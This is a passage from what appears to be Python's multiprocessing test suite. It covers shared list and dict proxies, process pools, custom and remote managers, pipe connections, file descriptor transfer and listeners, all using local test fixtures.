self.Array, 'i', range(10), lock='notalock')
arr5 = self.RawArray('i', range(10))
self.assertFalse(hasattr(arr5, 'get_lock'))
self.assertFalse(hasattr(arr5, 'get_obj'))
#
#
#
class _TestContainers(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_list(self):
a = self.list(list(range(10)))
self.assertEqual(a[:], list(range(10)))
b = self.list()
self.assertEqual(b[:], [])
b.extend(list(range(5)))
self.assertEqual(b[:], list(range(5)))
self.assertEqual(b[2], 2)
self.assertEqual(b[2:10], [2,3,4])
b *= 2
self.assertEqual(b[:], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4])
self.assertEqual(b + [5, 6], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4, 5, 6])
self.assertEqual(a[:], list(range(10)))
d = [a, b]
e = self.list(d)
self.assertEqual(
[element[:] for element in e],
[[0, 1, 2, 3, 4, 5, 6, 7, 8, 9], [0, 1, 2, 3, 4, 0, 1, 2, 3, 4]]
)
f = self.list([a])
a.append('hello')
self.assertEqual(f[0][:], [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 'hello'])
def test_list_iter(self):
a = self.list(list(range(10)))
it = iter(a)
self.assertEqual(list(it), list(range(10)))
self.assertEqual(list(it), []) # exhausted
# list modified during iteration
it = iter(a)
a[0] = 100
self.assertEqual(next(it), 100)
def test_list_proxy_in_list(self):
a = self.list([self.list(range(3)) for _i in range(3)])
self.assertEqual([inner[:] for inner in a], [[0, 1, 2]] * 3)
a[0][-1] = 55
self.assertEqual(a[0][:], [0, 1, 55])
for i in range(1, 3):
self.assertEqual(a[i][:], [0, 1, 2])
self.assertEqual(a[1].pop(), 2)
self.assertEqual(len(a[1]), 2)
for i in range(0, 3, 2):
self.assertEqual(len(a[i]), 3)
del a
b = self.list()
b.append(b)
del b
def test_dict(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
self.assertEqual(d.copy(), dict((i, chr(i)) for i in indices))
self.assertEqual(sorted(d.keys()), indices)
self.assertEqual(sorted(d.values()), [chr(i) for i in indices])
self.assertEqual(sorted(d.items()), [(i, chr(i)) for i in indices])
def test_dict_iter(self):
d = self.dict()
indices = list(range(65, 70))
for i in indices:
d[i] = chr(i)
it = iter(d)
self.assertEqual(list(it), indices)
self.assertEqual(list(it), []) # exhausted
# dictionary changed size during iteration
it = iter(d)
d.clear()
self.assertRaises(RuntimeError, next, it)
def test_dict_proxy_nested(self):
pets = self.dict(ferrets=2, hamsters=4)
supplies = self.dict(water=10, feed=3)
d = self.dict(pets=pets, supplies=supplies)
self.assertEqual(supplies['water'], 10)
self.assertEqual(d['supplies']['water'], 10)
d['supplies']['blankets'] = 5
self.assertEqual(supplies['blankets'], 5)
self.assertEqual(d['supplies']['blankets'], 5)
d['supplies']['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
del pets
del supplies
self.assertEqual(d['pets']['ferrets'], 2)
d['supplies']['blankets'] = 11
self.assertEqual(d['supplies']['blankets'], 11)
pets = d['pets']
supplies = d['supplies']
supplies['water'] = 7
self.assertEqual(supplies['water'], 7)
self.assertEqual(d['supplies']['water'], 7)
d.clear()
self.assertEqual(len(d), 0)
self.assertEqual(supplies['water'], 7)
self.assertEqual(pets['hamsters'], 4)
l = self.list([pets, supplies])
l[0]['marmots'] = 1
self.assertEqual(pets['marmots'], 1)
self.assertEqual(l[0]['marmots'], 1)
del pets
del supplies
self.assertEqual(l[0]['marmots'], 1)
outer = self.list([[88, 99], l])
self.assertIsInstance(outer[0], list) # Not a ListProxy
self.assertEqual(outer[-1][-1]['feed'], 3)
def test_namespace(self):
n = self.Namespace()
n.name = 'Bob'
n.job = 'Builder'
n._hidden = 'hidden'
self.assertEqual((n.name, n.job), ('Bob', 'Builder'))
del n.job
self.assertEqual(str(n), "Namespace(name='Bob')")
self.assertTrue(hasattr(n, 'name'))
self.assertTrue(not hasattr(n, 'job'))
#
#
#
def sqr(x, wait=0.0):
time.sleep(wait)
return x*x
def mul(x, y):
return x*y
def raise_large_valuerror(wait):
time.sleep(wait)
raise ValueError("x" * 1024**2)
def identity(x):
return x
class CountedObject(object):
n_instances = 0
def __new__(cls):
cls.n_instances += 1
return object.__new__(cls)
def __del__(self):
type(self).n_instances -= 1
class SayWhenError(ValueError): pass
def exception_throwing_generator(total, when):
if when == -1:
raise SayWhenError("Somebody said when")
for i in range(total):
if i == when:
raise SayWhenError("Somebody said when")
yield i
class _TestPool(BaseTestCase):
@classmethod
def setUpClass(cls):
super().setUpClass()
cls.pool = cls.Pool(4)
@classmethod
def tearDownClass(cls):
cls.pool.terminate()
cls.pool.join()
cls.pool = None
super().tearDownClass()
def test_apply(self):
papply = self.pool.apply
self.assertEqual(papply(sqr, (5,)), sqr(5))
self.assertEqual(papply(sqr, (), {'x':3}), sqr(x=3))
def test_map(self):
pmap = self.pool.map
self.assertEqual(pmap(sqr, list(range(10))), list(map(sqr, list(range(10)))))
self.assertEqual(pmap(sqr, list(range(100)), chunksize=20),
list(map(sqr, list(range(100)))))
def test_starmap(self):
psmap = self.pool.starmap
tuples = list(zip(range(10), range(9,-1, -1)))
self.assertEqual(psmap(mul, tuples),
list(itertools.starmap(mul, tuples)))
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(psmap(mul, tuples, chunksize=20),
list(itertools.starmap(mul, tuples)))
def test_starmap_async(self):
tuples = list(zip(range(100), range(99,-1, -1)))
self.assertEqual(self.pool.starmap_async(mul, tuples).get(),
list(itertools.starmap(mul, tuples)))
def test_map_async(self):
self.assertEqual(self.pool.map_async(sqr, list(range(10))).get(),
list(map(sqr, list(range(10)))))
def test_map_async_callbacks(self):
call_args = self.manager.list() if self.TYPE == 'manager' else []
self.pool.map_async(int, ['1'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(1, len(call_args))
self.assertEqual([1], call_args[0])
self.pool.map_async(int, ['a'],
callback=call_args.append,
error_callback=call_args.append).wait()
self.assertEqual(2, len(call_args))
self.assertIsInstance(call_args[1], ValueError)
def test_map_unplicklable(self):
# Issue #19425 -- failure to pickle should not cause a hang
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
class A(object):
def __reduce__(self):
raise RuntimeError('cannot pickle')
with self.assertRaises(RuntimeError):
self.pool.map(sqr, [A()]*10)
def test_map_chunksize(self):
try:
self.pool.map_async(sqr, [], chunksize=1).get(timeout=TIMEOUT1)
except multiprocessing.TimeoutError:
self.fail("pool.map_async with chunksize stalled on null list")
def test_map_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
# again, make sure it's reentrant
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(1, -1), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, exception_throwing_generator(10, 3), 1)
class SpecialIterable:
def __iter__(self):
return self
def __next__(self):
raise SayWhenError
def __len__(self):
return 1
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
with self.assertRaises(SayWhenError):
self.pool.map(sqr, SpecialIterable(), 1)
def test_async(self):
res = self.pool.apply_async(sqr, (7, TIMEOUT1,))
get = TimingWrapper(res.get)
self.assertEqual(get(), 49)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
def test_async_timeout(self):
res = self.pool.apply_async(sqr, (6, TIMEOUT2 + 1.0))
get = TimingWrapper(res.get)
self.assertRaises(multiprocessing.TimeoutError, get, timeout=TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT2)
def test_imap(self):
it = self.pool.imap(sqr, list(range(10)))
self.assertEqual(list(it), list(map(sqr, list(range(10)))))
it = self.pool.imap(sqr, list(range(10)))
for i in range(10):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
it = self.pool.imap(sqr, list(range(1000)), chunksize=100)
for i in range(1000):
self.assertEqual(next(it), i*i)
self.assertRaises(StopIteration, it.__next__)
def test_imap_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap(sqr, exception_throwing_generator(1, -1), 1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(10, 3), 1)
for i in range(3):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
# SayWhenError seen at start of problematic chunk's results
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 2)
for i in range(6):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap(sqr, exception_throwing_generator(20, 7), 4)
for i in range(4):
self.assertEqual(next(it), i*i)
self.assertRaises(SayWhenError, it.__next__)
def test_imap_unordered(self):
it = self.pool.imap_unordered(sqr, list(range(10)))
self.assertEqual(sorted(it), list(map(sqr, list(range(10)))))
it = self.pool.imap_unordered(sqr, list(range(1000)), chunksize=100)
self.assertEqual(sorted(it), list(map(sqr, list(range(1000)))))
def test_imap_unordered_handle_iterable_exception(self):
if self.TYPE == 'manager':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# SayWhenError seen at the very first of the iterable
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
# again, make sure it's reentrant
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(1, -1),
1)
self.assertRaises(SayWhenError, it.__next__)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(10, 3),
1)
expected_values = list(map(sqr, list(range(10))))
with self.assertRaises(SayWhenError):
# imap_unordered makes it difficult to anticipate the SayWhenError
for i in range(10):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
it = self.pool.imap_unordered(sqr,
exception_throwing_generator(20, 7),
2)
expected_values = list(map(sqr, list(range(20))))
with self.assertRaises(SayWhenError):
for i in range(20):
value = next(it)
self.assertIn(value, expected_values)
expected_values.remove(value)
def test_make_pool(self):
expected_error = (RemoteError if self.TYPE == 'manager'
else ValueError)
self.assertRaises(expected_error, self.Pool, -1)
self.assertRaises(expected_error, self.Pool, 0)
if self.TYPE != 'manager':
p = self.Pool(3)
try:
self.assertEqual(3, len(p._pool))
finally:
p.close()
p.join()
def test_terminate(self):
result = self.pool.map_async(
time.sleep, [0.1 for i in range(10000)], chunksize=1
)
self.pool.terminate()
join = TimingWrapper(self.pool.join)
join()
# Sanity check the pool didn't wait for all tasks to finish
self.assertLess(join.elapsed, 2.0)
def test_empty_iterable(self):
# See Issue 12157
p = self.Pool(1)
self.assertEqual(p.map(sqr, []), [])
self.assertEqual(list(p.imap(sqr, [])), [])
self.assertEqual(list(p.imap_unordered(sqr, [])), [])
self.assertEqual(p.map_async(sqr, []).get(), [])
p.close()
p.join()
def test_context(self):
if self.TYPE == 'processes':
L = list(range(10))
expected = [sqr(i) for i in L]
with self.Pool(2) as p:
r = p.map_async(sqr, L)
self.assertEqual(r.get(), expected)
p.join()
self.assertRaises(ValueError, p.map_async, sqr, L)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
# We want ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
if self.TYPE == 'processes':
with self.Pool(1) as p:
try:
p.apply(self._test_traceback)
except Exception as e:
exc = e
else:
self.fail('expected RuntimeError')
p.join()
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
# _helper_reraises_exception should not make the error
# a remote exception
with self.Pool(1) as p:
try:
p.map(sqr, exception_throwing_generator(1, -1), 1)
except Exception as e:
exc = e
else:
self.fail('expected SayWhenError')
self.assertIs(type(exc), SayWhenError)
self.assertIs(exc.__cause__, None)
p.join()
@classmethod
def _test_wrapped_exception(cls):
raise RuntimeError('foo')
def test_wrapped_exception(self):
# Issue #20980: Should not wrap exception when using thread pool
with self.Pool(1) as p:
with self.assertRaises(RuntimeError):
p.apply(self._test_wrapped_exception)
p.join()
def test_map_no_failfast(self):
# Issue #23992: the fail-fast behaviour when an exception is raised
# during map() would make Pool.join() deadlock, because a worker
# process would fill the result queue (after the result handler thread
# terminated, hence not draining it anymore).
t_start = time.monotonic()
with self.assertRaises(ValueError):
with self.Pool(2) as p:
try:
p.map(raise_large_valuerror, [0, 1])
finally:
time.sleep(0.5)
p.close()
p.join()
# check that we indeed waited for all jobs
self.assertGreater(time.monotonic() - t_start, 0.9)
def test_release_task_refs(self):
# Issue #29861: task arguments and results should not be kept
# alive after we are done with them.
objs = [CountedObject() for i in range(10)]
refs = [weakref.ref(o) for o in objs]
self.pool.map(identity, objs)
del objs
time.sleep(DELTA) # let threaded cleanup code run
self.assertEqual(set(wr() for wr in refs), {None})
# With a process pool, copies of the objects are returned, check
# they were released too.
self.assertEqual(CountedObject.n_instances, 0)
def test_enter(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
with pool:
pass
# call pool.terminate()
# pool is no longer running
with self.assertRaises(ValueError):
# bpo-35477: pool.__enter__() fails if the pool is not running
with pool:
pass
pool.join()
def test_resource_warning(self):
if self.TYPE == 'manager':
self.skipTest("test not applicable to manager")
pool = self.Pool(1)
pool.terminate()
pool.join()
# force state to RUN to emit ResourceWarning in __del__()
pool._state = multiprocessing.pool.RUN
with support.check_warnings(('unclosed running multiprocessing pool',
ResourceWarning)):
pool = None
support.gc_collect()
def raising():
raise KeyError("key")
def unpickleable_result():
return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_async_error_callback(self):
p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
